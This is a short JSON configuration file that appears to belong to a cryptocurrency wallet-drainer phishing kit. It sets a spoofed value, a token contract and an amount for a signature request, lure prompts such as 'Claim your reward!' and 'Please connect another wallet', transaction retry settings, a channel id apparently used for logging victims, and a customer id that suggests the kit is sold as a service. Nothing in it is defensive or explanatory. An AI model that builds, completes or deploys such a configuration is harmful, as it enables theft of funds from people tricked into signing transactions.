{
  "SPOOF": "1000.0",
  "TRAFFIC": "crypto",
  "SIG_FROM": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
  "ASSET_MIN": "10",
  "DARK_MODE": true,
  "SIG_CONFIG": [
    {
      "itemType": 1,
      "token": "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
      "amount": "500000000"
    }
  ],
  "MODAL_STYLE": "0",
  "BUNDLES_7702": false,
  "FULL_LOG_URL": false,
  "ERROR_MESSAGE": "Please connect another wallet",
  "MODAL_AUTOOPEN": false,
  "SIG_TEXT_ERROR": "An authorization error occurred",
  "TX_RETRY_COUNT": "3",
  "CONFIRM_MESSAGE": "Please confirm the transaction",
  "CRYPTO_PRIORITY": "1.7",
  "LOADING_MESSAGE": "Processing",
  "SIG_TEXT_PROMPT": "Claim your reward!",
  "VERIFY_SIGNATURE": "0",
  "LOGS_TO_THE_CHANNEL": "-1002753237744",
  "CUSTOMER_ID": "A00A-1127-619E",
  "REOWN_ID": "1d7ffe34ac8cf7b2a28d17efe7bc5b30"
}